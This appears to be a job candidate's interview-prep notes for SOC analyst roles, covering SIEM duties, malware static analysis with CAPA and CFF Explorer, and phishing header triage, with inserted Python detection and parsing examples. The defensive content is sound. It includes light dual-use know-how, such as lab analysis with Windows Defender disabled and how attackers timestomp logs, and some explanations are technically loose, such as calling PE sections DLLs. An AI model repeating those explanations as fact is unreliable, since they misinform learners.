
Interviewer: Vishnu Sinkar & Arun Kanhirassery - 90k to 100k

Arun - Dawn - The first appearance of light in the sky before sunrise
Ernst & Young is a multinational professional services network with headquarters in London, England.
Its purpose is "Building a better working world".
Very good culture & people
Outstanding company
Work-life balance
EY really provides quality services.
EY is dedicated to helping organizations solve their toughest challenges.
EY PWC P&G Deloitte
Splunk SIEM, Microsoft Azure Sentinel SIEM, Securonix NG SIEM, ArcSight SIEM
Splunk Ticketing, Service Now, BMC ServiceDesk, Remedy Ticketing System
Carbon Black, Falcon Insight, Sophos Intercept
Symantec ESG AM DLP

Interviewer: - 100k to 110k


Baker McKenzie
World’s Strongest Law Firm Brand for 11 Years
You have the Our People Deal that delivers the best employee experience to achieve a lot of great things globally.
The three pillars of the People Deal are "Global Citizens, One Team, Client Centric", which reflect the strategic focus on client service, inclusion and performance.

Interviewer: Paulo Nicolas and our San Diego InfoSec Team - 90k to 100k
Dexcom Taguig 4.8 Overall 4.0
Outstanding Company
Good Culture & People
Work Life Balance
American healthcare company specializing in medical devices.
Dexcom was founded in 1999.
Dexcom empowers people to take control of diabetes through innovative continuous glucose monitoring (CGM) systems.
Headquartered in San Diego, California.
Dexcom empowers people to take control of diabetes and has emerged as a leader in diabetes care technology.
This company really cares about people. They listen to the needs of users, caregivers, and providers.
Dexcom simplifies and improves diabetes management around the world.

Yes, no problem. First of all, thank you very much for inviting me to be interviewed for this position.
My name is Christan George; you can call me George for short. I'm 27 years old. I have 3 siblings and I am the eldest.
I am applying for this job because I think the skills, the qualities and the experience that I have are a strong match for the job description.
Over the years, I have built a lot of skills and qualities that I believe will be a benefit to your organization.
I'm a very strong team worker, I am very focused on achieving difficult tasks and I am the type of person that will work hard, and I will never let you down.
I feel that if I am the successful candidate for this position, you will quickly see a positive return on your investment.
I have a total of 8 years of experience in the IT industry, of which my first 3 years were focused on the network engineering side of things and the last 5 years on information security.

I started my career as an OJT at Rivan School of Technology and was absorbed by the company.
Rivan is a local company here in the Philippines; it's a three-way company: a testing center, a training center and a consulting company, with branches in Manila and Makati.
Basically, it's a solutions company related to network, system and security.
Rivan deployed me to multiple companies as a NOC Analyst under non-disclosure contractual arrangements.

Later on, I was hired by Masergy Communications as a SOC Analyst.

Masergy Communications offers Managed Security Services (MSS) that use its proprietary Security Incident and Event Management (SIEM) tool, which we call Unified Enterprise Security (UES) or All in One Security Module (ASM).
This tool consists of the Detection and Prevention Module (DPM), Behavioral Control Module (BCM), Firewall Syslog Module (FSM), Vulnerability Scanning Module (VSM) and the Master Control Unit (MCU).

DPM - This sensor has Suricata installed. It runs to capture network traffic and creates alerts based on 45,000+ rules in the field.
BCM - This sensor takes the packet header information from the network traffic mirrored from the customer; after collecting for one hour, it processes the data through several stages to create an alert.
FSM - This sensor is our security event correlation module that ingests, parses and generates alerts from common log sources provided by the customer, like Sysmon, Windows System and Security, firewalls, proxy, NetFlow, DNS, PCAP, DHCP etc.
VSM - This sensor is deployed as an integrated scanner at the client. Previously we were using Nessus, but there was a problem with pricing or licensing, so we changed to SAINT Security Suite for the scanning software. It can also perform data and security scans based on the critical assets provided by the client.
Lastly the MCU - this is where we set up an encrypted channel to communicate with our boxes. We access the web-based console remotely; the alert and traffic data are presented through the front-end GUI that we call WebApp.

As a SOC Analyst, I am assigned to perform duties on a daily basis such as:

• Monitoring critical infrastructure across the customer's environment, and responding to incoming events by recognizing and identifying potential security incidents detected by the Masergy SIEM.
• We also work with the US and UK based Masergy SOCs on handling IR ticket escalations. This is mostly pending tickets where we need some additional investigation.
• I also maintain a high quality of work, at least 90%+ of KPI per month, which includes IR email accuracy, Priority 1 response time and some technical enhancement (tuning, auditing, checking of sensors and other data sources).
• During my shift, I'm the one handling the monitoring assignments and additional tasks for my associates, like how many clients they will monitor, who is focusing on the event notifier, status updates, P1 alerts, emails etc.
• We also interact professionally with the customers as an extension of their SOC team. For example, what open source tools can we recommend for PDF and Microsoft document analysis, or some IOC scanner for an infected machine.

On the other side,

• I do some tuning of false positive and normal alerts so we can provide more efficient and effective monitoring.
For example, an authorized scan per the customer's feedback. They are like Qualys, Tenable and Rapid7. We need to tune this out for a specific period of time to reduce the noise.
CVE - Common Vulnerabilities and Exposures - is a list of publicly disclosed computer security flaws.
Another example is a CVE that was sent out to the customer, but they confirmed it is unused or nonexistent in their environment. It's a FP; we need to tune this out to stop the noise and check our detection strategies for what logic triggers the alert. We can tweak the rules so we don't receive that kind of FP alert again and we can focus on more worthwhile alerts.

• I also audit IR emails to ensure my associates are following the IR SOP based on our playbook.
One example of that is correct categorization of the ticket. Every incident should be properly categorized so the customer will not be confused when they start investigating. This is very critical because we are using auto-generated templates for prevention and remediation, and they are unique to every category. Imagine if you receive a phishing alert and send it out with a malware category: automatically one of our recommendations there is to block the offending IP and domain, which is not always the best practice for handling a phishing alert.
What if this is a legit hosting IP and the adversary is actually abusing it? Let's say DigitalOcean. I'm going to create a domain, point it to the legit hosting IP and send a phishing campaign to your company. What will you do? Remember, if you block the IP, there are legit websites using this IP, so what we suggest is to block the domain for now. Send some follow-up to confirm with the customer whether they have any business with them.

• Sometimes we also create or modify FSM alerts based on the forwarded logs using regex. Common log sources provided by the customer are: Sysmon, Windows System and Security, firewalls, proxy, NetFlow, DNS, PCAP, DHCP etc. We use default parsers and rules that are maintained by Masergy to make these alerts, but sometimes we also tailor those alerts if the client wants to be alerted, or not alerted, on specific parameters such as event codes, logon types, account names and admin groups or users.
We gather data via pull or push.
Pull - We offer selected integrations that will pull information from the REST API, like Carbon Black.
Push - The customer can always forward data in syslog format to our box.
You can forward us the logs in syslog format over UDP port 514. Log data is stored on the device for 365 days.
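As an added example (not Masergy's FSM code, which is proprietary), the following Python rule set shows how alerts over syslog-forwarded Windows Security events can be tailored on event codes, logon types, account names and admin-group membership, as described above. The log lines, hostname, accounts and allowlists are all constructed.

```python
"""Added example: tailoring Windows Security alerts by event code, logon
type, account name and admin-group membership over syslog-forwarded logs.
Everything here (log lines, accounts, allowlists) is constructed."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

Event = Dict[str, str]

# Constructed syslog lines (UDP/514 style) in the key=value layout many forwarders emit.
SAMPLE_LOGS = """\
<14>Jun 10 02:13:07 DC01 Security: EventCode=4624 LogonType=10 TargetUserName=svc_backup IpAddress=203.0.113.9
<14>Jun 10 02:13:09 DC01 Security: EventCode=4624 LogonType=10 TargetUserName=jdoe IpAddress=10.0.5.23
<14>Jun 10 02:13:11 DC01 Security: EventCode=4624 LogonType=3 TargetUserName=jdoe IpAddress=10.0.5.23
<14>Jun 10 02:14:00 DC01 Security: EventCode=4672 TargetUserName=jdoe
<14>Jun 10 02:14:02 DC01 Security: EventCode=4672 TargetUserName=adm_ops
<14>Jun 10 02:15:30 DC01 Security: EventCode=4720 TargetUserName=helpdesk2 SubjectUserName=adm_ops
<14>Jun 10 02:16:00 DC01 Security: EventCode=4625 LogonType=3 TargetUserName=administrator IpAddress=198.51.100.7
"""

# Per-customer tuning knobs (constructed values): who may hold admin rights,
# who may use RDP, and which ranges count as internal.
ADMIN_ACCOUNTS = {"adm_ops"}
RDP_ALLOWED = {"adm_ops"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

LINE_RE = re.compile(r"^<\d+>(?P<ts>\w{3} +\d+ [\d:]+) (?P<host>\S+) Security: (?P<kv>.*)$")


def parse_line(line: str) -> Optional[Event]:
    """Split one syslog line into a dict of fields; None if it is not a Security event."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev: Event = {"ts": m["ts"], "host": m["host"]}
    ev.update(re.findall(r"(\w+)=(\S+)", m["kv"]))
    return ev


def is_internal(ip: Optional[str]) -> bool:
    """True when the address falls inside one of the customer's internal ranges."""
    if not ip:
        return False
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


@dataclass
class Rule:
    name: str
    event_code: str                      # Windows Security event ID the rule applies to
    matches: Callable[[Event], bool]     # extra condition on the parsed fields


RULES = [
    # 4624 with LogonType 10 = RemoteInteractive (RDP); alert unless the account is allowlisted.
    Rule("RDP logon by account outside RDP allowlist", "4624",
         lambda e: e.get("LogonType") == "10" and e.get("TargetUserName") not in RDP_ALLOWED),
    # 4672 = special privileges assigned; only expected for the admin group.
    Rule("Special privileges assigned to non-admin account", "4672",
         lambda e: e.get("TargetUserName") not in ADMIN_ACCOUNTS),
    # 4720 = user account created; always worth a ticket for this (constructed) customer.
    Rule("User account created", "4720", lambda e: True),
    # 4625 = failed logon; the built-in administrator targeted from outside is suspicious.
    Rule("Failed logon to built-in administrator from external IP", "4625",
         lambda e: e.get("TargetUserName", "").lower() == "administrator"
         and not is_internal(e.get("IpAddress"))),
]


def run_rules(raw_logs: str) -> List[dict]:
    """Apply every rule to every parsable line and return the alerts in log order."""
    alerts = []
    for line in raw_logs.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        for rule in RULES:
            if ev.get("EventCode") == rule.event_code and rule.matches(ev):
                alerts.append({"rule": rule.name, "ts": ev["ts"], "host": ev["host"],
                               "user": ev.get("TargetUserName"), "ip": ev.get("IpAddress")})
    return alerts


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_LOGS):
        print(alert)
```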

• I'm also involved in facilitating training for the new members of the Manila SOC team.
For example, explaining how they can use some open source tools like URLScan, VirusTotal, IPVoid, RiskIQ, IPDatabase, Intezer, Whois. If you have IOCs like IP addresses, hashes and domains, can you check if they're malicious or not? Can you check if this website is hosting ransomware or malicious JavaScript? Can you give me some metadata? Can you check if there are different antivirus vendors that would flag this as malicious?
CyberChef, the cyber Swiss army knife of security professionals. Let's say I have Base64 strings; at some point in time you will analyze an encoded command that you need to decode, so this is where you can use CyberChef. You just need to choose the proper recipe, bake it and it will automatically give you an output.
What else? CFF Explorer, CAPA, PE Studio, Sysinternals Suite for static malware analysis: extract some metadata (like file type, file size, when it was created and modified, the hashes), what the capabilities of this binary are (maybe it can write files, create and terminate some processes), important headers, strings, DLLs related to this.
Some public malware sandboxes like Hybrid Analysis, Any.Run, Cuckoo and Joe Sandbox: you can just drop the file or IOCs and it will automatically give you a report. Let's say I need to know if this is malicious or not and I don't want to run this on my production laptop, so I will run this on a public malware sandbox. I will drop a certain file like a PDF and suddenly it gives me information like, if a user clicks this document what would happen in the background? It would run cmd or PowerShell, it would run a couple of commands which are very malicious because it's connecting to some C2 IP and shortened links. Aside from that, we can also see a process graph, or what we call a process tree, like on Carbon Black or SentinelOne, and some mapping to the MITRE ATT&CK framework.

Just a caveat here: due to OPSEC (operational security), we don't just upload sample files coming from our internal network, because they might contain sensitive information about our organization like maybe recipes, projectX, salary details of our employees. What we can do is get the hash value of the file and check it on VT, HA, Intezer and everything.

• We also assist with the development of processes and procedures for overall SOC functions. Since the pandemic, the latest is that we did an on-call procedure and policy, because right now our setup is WFH and sometimes we cannot assure that the internet connection is stable and that there is no power outage or interruption; lately we have had an earthquake and typhoons here, so we outlined a document that aims to lessen the risk of our manpower being below the threshold.

• Mostly I serve as a go-to person for my teammates when they need assistance in analyzing an event or when they need someone to double check their work.

Kaseya is a software company that provides services to different MSSPs. They got breached and they call it a supply chain attack; it's like the same attack last year in December that happened to SolarWinds, which was breached because of a supply chain attack wherein, during the updates of the configuration or the platform itself, there was a backdoor like a DLL that was delivered to all of their clients. But in Kaseya it's ransomware: their platform has been infected by ransomware.
A backdoor negates normal authentication procedures to access a system. Remote access is granted to the adversary and it can remotely issue system commands and update the malware or the payload itself.
Ransomware is malware that encrypts the victim's files; the adversary demands a ransom to restore access to the data via a decryption key upon payment.

Analyzing PE File Structures using CAPA & CFF Explorer

We will check the important header information and IOCs (Indicators of Compromise).
Windows Defender and Real-Time Protection are off.
Open the sample via CFF Explorer.
File type, file size, when it was created and modified, the hashes.
DOS Header - the magic value is in hexadecimal; it means we are dealing with a Windows PE file.
File Header
Machine - for example, it is for an Intel processor and a 32/64-bit application.
NumberOfSections - defines how many sections (DLL's) the sample contains.
TimeDateStamp - when this sample was compiled. Convert it using epochconverter.
Characteristics - File is executable, relocation info stripped from file and 32-bit word machine.
Optional Header
DLLCharacteristics - DLL can move, image is NX compatible and Terminal Server Aware.
Section Header
You will see the data segments named:
.text - this is where the code of the program is found
.rdata - this is where constant, read-only, initialized data is found
.data - this is where the program's initialized data is found
.rsrc - this is where resources for the PE are found: icons, menus, dialogs, version info, fonts etc.
Import Directory
It gives us more understanding of the functionality and capabilities of the sample being analyzed.
This is where you can see that the sample depends on different DLL's. These are the libraries included in the malware:
USER32.dll
KERNEL32.dll
COMCTL32.dll
ADVAPI32.dll
Resource Editor
Let's focus on the level data - the execution level required to run this binary is set to asInvoker.
This means that it does not require a high-privilege user to run the program. Either an admin or a normal user will do.
CAPA
- is a tool made by people from Mandiant/FireEye that automatically identifies malware capabilities.
- it uses rules written by experts. It analyzes, identifies and recognizes the capabilities of the binary or the PE file.
1st, go to the file path where our capa application is located, then input:
capa.exe -vv (very verbose) malware.exe
capa supports Windows PE files (EXE, DLL, SYS) and shellcode. To run capa on a shellcode file you must explicitly specify the file format and architecture, for example to analyze 32-bit shellcode:
$ capa -f sc32 shellcode.bin
To obtain detailed information on identified capabilities, capa supports two additional verbosity levels. To get the most detailed output on where and why capa matched on rules use the very verbose option:
$ capa -vv suspicious.exe
If you only want to focus on specific rules you can use the tag option to filter on fields in the rule meta section:
$ capa -t "create TCP socket" suspicious.exe
Display capa's help to see all supported options and consult the documentation:
$ capa -h

Terminal Server Aware means that this binary is capable of running under Remote Desktop Services; even if the interactive logon connection was lost, this binary can survive using Remote Desktop Services.

The epoch value can be modified by the malware author during the weaponization phase using low-level languages, and their purpose is to confuse the forensicators. Let's say, okay, this is like a new malware, or no, this is an old malware; the goal is for the blue teamers to have a hard time distinguishing the information that they need.
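As an added illustration (not CFF Explorer's or CAPA's code), here is a standard-library Python parser that pulls the header fields walked above out of a PE file: the DOS magic, Machine, NumberOfSections, TimeDateStamp converted from epoch, Characteristics, DllCharacteristics, the section names and the hash. The input it runs on is a constructed header-only PE image (no code), not a real binary, and the timestamp in it is a made-up value.

```python
"""Added example: read the PE header fields discussed above with the standard library.
The sample input is a constructed header-only PE (no code), not a real binary."""
import datetime
import hashlib
import struct

MACHINES = {0x14C: "Intel 386 (32-bit)", 0x8664: "x64 (AMD64)", 0xAA64: "ARM64"}
FILE_CHARACTERISTICS = {
    0x0001: "Relocation info stripped from file",
    0x0002: "File is executable",
    0x0100: "32-bit word machine",
    0x2000: "File is a DLL",
}
DLL_CHARACTERISTICS = {
    0x0040: "DLL can move (ASLR)",
    0x0100: "Image is NX compatible",
    0x8000: "Terminal Server Aware",
}


def flag_names(value: int, table: dict) -> list:
    """Expand a bitmask into the human-readable names CFF Explorer shows."""
    return [name for bit, name in table.items() if value & bit]


def parse_pe(data: bytes) -> dict:
    """Parse DOS header, File Header, Optional Header and Section Headers from raw bytes."""
    if data[:2] != b"MZ":  # DOS header magic: anything else is not a Windows PE file
        raise ValueError("not a PE file: DOS magic is not MZ")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]  # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    fh = e_lfanew + 4  # IMAGE_FILE_HEADER (20 bytes)
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20  # IMAGE_OPTIONAL_HEADER starts right after the file header
    opt_magic = struct.unpack_from("<H", data, opt)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]  # same offset in PE32 and PE32+
    sections = []
    sec = opt + opt_size  # section table follows the optional header, 40 bytes per entry
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, sec + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": vaddr,
                         "raw_size": rawsize, "raw_offset": rawptr})
    compiled = datetime.datetime.fromtimestamp(timestamp, tz=datetime.timezone.utc)
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "machine": MACHINES.get(machine, hex(machine)),
        "number_of_sections": nsections,
        "compiled_epoch": timestamp,
        "compiled_utc": compiled.strftime("%Y-%m-%d %H:%M:%S UTC"),
        "characteristics": flag_names(chars, FILE_CHARACTERISTICS),
        "pe_format": {0x10B: "PE32", 0x20B: "PE32+"}.get(opt_magic, hex(opt_magic)),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "sections": sections,
    }


def build_sample_pe() -> bytes:
    """Construct a header-only 32-bit PE image with four sections (no code, cannot run)."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    # Machine=i386, 4 sections, made-up TimeDateStamp, 224-byte optional header,
    # Characteristics = RELOCS_STRIPPED | EXECUTABLE_IMAGE | 32BIT_MACHINE
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 4, 1624000000, 0, 0, 224,
                           0x0001 | 0x0002 | 0x0100)
    opt = bytearray(224)                       # PE32 optional header is 224 bytes
    struct.pack_into("<H", opt, 0, 0x10B)      # Magic = PE32
    struct.pack_into("<H", opt, 68, 2)         # Subsystem = Windows GUI
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x8000)  # DllCharacteristics
    secs = b""
    raw = 0x400
    for name, size in ((b".text", 0x3000), (b".rdata", 0x1000), (b".data", 0x800), (b".rsrc", 0x600)):
        # name, VirtualSize, VirtualAddress (illustrative), SizeOfRawData, PointerToRawData, ...
        secs += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), size, raw * 4, size, raw,
                            0, 0, 0, 0, 0x40000040)
        raw += size
    return dos + b"PE\0\0" + file_hdr + bytes(opt) + secs


if __name__ == "__main__":
    for key, value in parse_pe(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Feeding parse_pe a real sample (open(path, "rb").read()) gives the same fields CFF Explorer displays; a file that claims to be a PDF but starts with MZ is caught by the first check.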

There's some timestomping activity that was done by APTs: aside from clearing the whole logs, they can also modify time attributes to hide changes to existing logs. Let's say I'm going to attack your organization during the weekend, but I don't want you to see my activities, so I will manipulate the timestamp and blend it into weekdays during normal working hours.

Malware Static Analysis

PowerShell (Run as Admin)
cd "C:\Users\IEUser\Desktop\CDTH Lab Files\Day1\analyst2_malware_sample"
ls
cd ..
cd "C:\Users\IEUser\Desktop\CDTH Lab Files\Day1"
.\SysinternalsSuite\sigcheck.exe -h .\sample1.bin
.\SysinternalsSuite\strings.exe .\sample1.bin
Wireshark - Resolved Addresses, Protocol Hierarchy, Conversations, Endpoints etc.

SIEM (Security Information & Event Management)

It's a solution that provides a holistic view of what is happening on the network in real time.
This is where all the logs are forwarded; this is our central repository, and some correlation engines in the background are inspecting these logs for any naughtiness or maliciousness, then it will give us an alert.
This also acts like a ticketing system where I can see the unresolved alerts, maybe P1 or P2, and I can also do my investigations in this platform.
I can see a lot of dashboards here: here's the top 10 IP addresses that are attacking us this week, here's the top 10 machines that triggered different alerts today.
12 components and capabilities in a SIEM architecture:
Data aggregation, threat intelligence feeds, correlation and security monitoring, analytics, alerting, dashboards, compliance, retention, forensic analysis, threat hunting, incident response, SOC automation.
Splunk, QRadar, ArcSight, LogRhythm and ELK

Most of my SIEM experience is on the Masergy appliance, but as a SOC Analyst I also try other SIEMs like Splunk, QRadar, ELK and LogPoint from range trainings and free trials. These enterprise SIEMs have a lot of capabilities: there are a lot of customizable dashboards, graphs, inspections and visualizations, and you can also ingest different log formats aside from the syslog that we are using. They also have a lot of different filters that are very useful for threat hunting, like process.commandline and process.executable; you can try a lot of different detection strategies, you can also get a notification for specific alerts if you want to, and you can save previous queries for future reference. They are very powerful, I think.

IDS (Intrusion Detection System) - It will give you an alert, but it doesn't have the capability to block.
IPS (Intrusion Prevention System) - If the detection strategy triggers because this is malicious, it can block it.
It monitors network and host traffic, inbound and outbound, for indicators of an attack.
Cisco, McAfee, Trend Micro, Darktrace, Suricata
Security Onion is a VM with packages wherein it has Bro/Zeek, Suricata, Snort; all of these open source tools gathered in one VM.

SOAR (Security Orchestration, Automation & Response) is a collection of security software solutions and tools for browsing and collecting data from a variety of sources.
It's like a SIEM with the response: when you receive something on the event notifier and it was tagged as malicious, it will automatically do everything, like checking on VirusTotal and blocking it, killing the process, quarantining the file; it all depends on the security control that you configure. It will also create a report automatically and send it to your global distribution list. It's very powerful; you just need to prepare your custom playbooks.
Swimlane, Splunk Phantom, IBM Resilient

ESG (Email Security Gateway) is a defense against malicious email, spam, spear phishing, whaling, ransomware and even zero-day attacks.
If you have read reports this 2021 from the Verizon Data Breach Investigations Report, the Red Canary Threat Detection Report, the Threat Landscape Report and the Vade Secure report, phishing is still the dominant or most heavily used initial access for the adversaries' attacks. So if we don't have any security appliance protecting our email gateway then we are very vulnerable even to a simple phishing attack. ESG can do some filtering of common signatures, especially those file formats that were converted from .exe to .pdf; it can block them because of some deep header analysis feature, I think.
Proofpoint, Mimecast, Forcepoint, Sophos, Microsoft 365 E5
Let's say we have Microsoft 365 E5 and on top of that we are also using Proofpoint "Advanced Email Security" as an additional layer of security to filter most of the phishing and spam emails at the perimeter level. For example, we have 1M alerts related to email; then Proofpoint will drill it down to 200K alerts using its deep header analysis feature, so there is an efficiency. Then the 200K alerts will also be filtered using the capability of Microsoft 365 E5, by checking if they are properly aligned to a configuration: if SPF and DKIM pass, allow that email to be received, but if SPF passes and DKIM fails, I want you to drop or reject that email or put it in spam.

SMTP Attack Analysis

An attacker sends an email to the victim - the victim clicks on the link and goes to the phishing website - the attacker collects the victim's credentials that were used - the attacker uses the victim's credentials to access the legit website.
Phishing is heavily used for credential harvesting (fake login pages) and to deliver malicious payloads (URLs or attachments); the payload will be compressed and password protected for more sophistication.
I think right now the default configuration of some email providers does not accept attachments with .exe in them.
To effectively perform SMTP analytics, we can collect SMTP logs from our data sources like Microsoft Exchange, spam appliance, Postfix, Sendmail, Bro/Zeek etc.
Common fields that we need to look at when investigating: From, Reply-To, Return-Path, Subject, Source IP, Destination IP, File Attachment Name and Size etc.
Header fields - Received-SPF, Authentication-Results, DKIM-Signature, Message-ID
Keep an eye out for: emails being sent within a small time window from an external source, usage of key personnel names (whaling), domain names similar to our organization's, abnormal SMTP user agents.
Three ways to verify an email was not spoofed (RFC 7001, "Email Authentication Technology"):
SPF (Sender Policy Framework) - Mail comes from a verified source. Let's say I'm only allowing my SMTP server IP to send emails coming from this server.
DKIM (DomainKeys Identified Mail) - It's like the messages that you send have intact integrity and are verified via digital signature. I believe it's recommended to be configured properly so our organization can be more legitimate or reputable.
DMARC (Domain-based Message Authentication, Reporting & Conformance) - It's like an ACL (Access Control List) saying that if SPF and DKIM pass, allow that email to be sent, but if SPF passes and DKIM fails, I want you to drop or reject that email or put it in spam; it's more about defining the rules.

Okay, there's a phishing alert on the SIEM. First, I will check the rebuild. It's the content or log snippet that triggered the alert; maybe there is sensitive information like username, email and password. I will also check the reputation of the IP address on VT, IPVoid, Intezer, Talos, X-Force etc. The domain that was accessed will be visually inspected in URLScan or CheckPhish. We will also check all available logs to see if there are other users involved in this alert. Then if it's a TP based on the analysis, like exposed credentials and the IP and domain being tagged as phishing, we will permanently block it and send an email with a follow-up call to the client. We will tell them that we detected traffic wherein one of their users accessed a phishing site and credentials were exposed. It would be advisable for the user to change credentials to avoid being compromised and to use MFA as additional security. They also need to delete anything related to the email across their environment and the user should take security awareness training.

In some internal cases, the scenario is like: HR staff notice that they received an email with a link and attachment that they were not expecting. What they will do is create a ticket in JIRA, attach the suspicious email and forward it to us, and we will begin the investigation.
1st, as part of Preparation, I will open all the tools that I use when dealing with this kind of ticket: VT, IPVoid, RiskIQ, Intezer, URLScan, CheckPhish, URLVoid, MXToolBox, Azure Header Analyzer, PhishTank.
After that I will proceed with Detection and Analysis. I will personally check what I think about the email: is it spam? Reconnaissance? Impersonation? I can also ask the user if they clicked the link or downloaded some files. Next is to extract the full email header information and make sure to check the important fields like:
From - does the email address match the display name?
Reply-To - does it match the source or sender? Because if not, there's a very good chance that it's forged.
Return-Path - does it match where the message originated ("From")?
Subject - high-level topic of the message
Source and Destination IP
Received-SPF - mail comes from a verified source; you can see the source IP
Authentication-Results - did SPF and DKIM pass?
DKIM-Signature - it contains information about the sender, the message and the public key that is required for verification
Message-ID - it's like a tracking number
We will also check all the logs for additional information, like: was the traffic automatically blocked? How many attempts were triggered for that specific time frame? Do we have other related users involved in this alert?
Check the reputation of the link: what does it look like? Any hits for phishing?
Put the attachment in a malware sandbox and wait for the report to finish. "You can DL the binary for future reference."
Upon further investigation I concluded that this is a kind of impersonation because the sender is GeorgeDGreat@Wow-PH.com, which is not the naming convention that we are using in the organization; it should be Wow.PH.com.
Containment phase: we should block the IP address, the domain and the hashes related to this ticket. For Eradication, we can request purging of the email because it has an attachment that we can investigate further, and the deletion of anything related to this email across our environment.
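The header checks listed above, as an added Python example that is not part of these notes: it parses a constructed message, compares the From, Reply-To, Return-Path and Message-ID domains, reads Received-SPF and Authentication-Results, flags a lookalike of the organization's domain (wow.ph.example and wow-ph.example are placeholders standing in for the Wow.PH.com vs Wow-PH.com case), and applies the SPF/DKIM rule of thumb from the DMARC note in the SMTP section. The quarantine branch for other result combinations is my assumption, not from the notes.

```python
"""Added example: email header triage for a suspected impersonation.
The message, domains and addresses are constructed placeholders (.example TLD)."""
import re
from email import message_from_string
from email.utils import parseaddr

ORG_DOMAIN = "wow.ph.example"  # constructed stand-in for the organization's real mail domain

# Constructed headers of a suspicious "resume" email as the HR staff might forward it.
SAMPLE_RAW = """\
Return-Path: <bounce@mail-relay.example.net>
Received: from mail-relay.example.net (mail-relay.example.net [203.0.113.45])
        by mx.wow.ph.example with ESMTP id abc123; Mon, 14 Jun 2021 09:12:33 +0800
Received-SPF: pass (wow.ph.example: domain of bounce@mail-relay.example.net designates 203.0.113.45 as permitted sender) client-ip=203.0.113.45
Authentication-Results: mx.wow.ph.example; spf=pass smtp.mailfrom=mail-relay.example.net; dkim=fail header.d=example.net; dmarc=fail header.from=wow-ph.example
From: "HR Department" <GeorgeDGreat@wow-ph.example>
Reply-To: recruiter.reply@mail-relay.example.net
To: hr@wow.ph.example
Subject: Resume for Open Position
Message-ID: <20210614011233.1A2B3C@mail-relay.example.net>
Date: Mon, 14 Jun 2021 09:12:30 +0800
Content-Type: text/plain

Please see the attached resume.
"""


def domain_of(header_value: str) -> str:
    """Domain part of the address in a From/Reply-To/Return-Path/Message-ID value."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def squash(domain: str) -> str:
    """Drop punctuation so wow-ph.example and wow.ph.example compare equal (lookalike test)."""
    return re.sub(r"[^a-z0-9]", "", domain.lower())


def auth_results(msg) -> dict:
    """Collect spf=/dkim=/dmarc= verdicts from every Authentication-Results header."""
    results = {}
    for hdr in msg.get_all("Authentication-Results", []):
        for mech, verdict in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", hdr, flags=re.I):
            results[mech.lower()] = verdict.lower()
    return results


def policy_verdict(spf: str, dkim: str) -> str:
    """The rule of thumb from the notes: both pass -> deliver; SPF pass but DKIM fail -> reject.
    Any other combination is quarantined here (an assumption, not from the notes)."""
    if spf == "pass" and dkim == "pass":
        return "deliver"
    if spf == "pass" and dkim == "fail":
        return "reject"
    return "quarantine"


def triage(raw: str) -> dict:
    """Return the fields an analyst checks first plus a list of findings."""
    msg = message_from_string(raw)
    display_name, from_addr = parseaddr(msg.get("From", ""))
    from_dom = from_addr.rpartition("@")[2].lower()
    reply_dom = domain_of(msg.get("Reply-To"))
    return_dom = domain_of(msg.get("Return-Path"))
    msgid_dom = domain_of(msg.get("Message-ID"))
    spf_match = re.search(r"client-ip=([\d.]+)", msg.get("Received-SPF", ""))
    source_ip = spf_match.group(1) if spf_match else None
    auth = auth_results(msg)

    findings = []
    # Similar-looking domain to our own (the Wow-PH vs Wow.PH case from the notes).
    if from_dom != ORG_DOMAIN and squash(from_dom) == squash(ORG_DOMAIN):
        findings.append(f"From domain {from_dom} is a lookalike of {ORG_DOMAIN}")
    # Reply-To / Return-Path / Message-ID should normally agree with the From domain.
    for label, dom in (("Reply-To", reply_dom), ("Return-Path", return_dom), ("Message-ID", msgid_dom)):
        if dom and dom != from_dom:
            findings.append(f"{label} domain {dom} differs from From domain {from_dom}")
    for mech in ("spf", "dkim", "dmarc"):
        if mech in auth and auth[mech] != "pass":
            findings.append(f"{mech.upper()} result is {auth[mech]}")

    return {
        "from_display_name": display_name, "from": from_addr, "reply_to_domain": reply_dom,
        "return_path_domain": return_dom, "subject": msg.get("Subject"), "source_ip": source_ip,
        "authentication": auth, "policy_verdict": policy_verdict(auth.get("spf"), auth.get("dkim")),
        "findings": findings,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_RAW).items():
        print(f"{key}: {value}")
```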

Let's say that the phishing attempt by the adversary is successful: the HR staff downloaded the attachment and ran the executable disguised as a PDF file, like it's a resume of an applicant.
It was detected by the SIEM. I will click the ticket and I will be redirected to our EDR, and after that it will display everything that I need for the investigation.
It will display information like: file name, file type, file path, hashes, IP addresses, original process and some command line arguments; there's a lot.
Since I have this information and my tools are already prepared, I will start with the analysis phase. I will correlate or fetch the host and network logs, or all the logs, based on the IP address and hashes; maybe there's some connection going outside of our network that is happening.
I will also check the reputations on VT, Talos, X-Force. I will check the file path; maybe there was something dropped in the %Temp%, %AppData% or %Public% folder. By doing that I can already tell if this is related to some ransomware campaign.
If this is a TP, we have an incident. I need to act fast, I need to stop the bleeding, so I will start the containment since I'm the 1st responder.
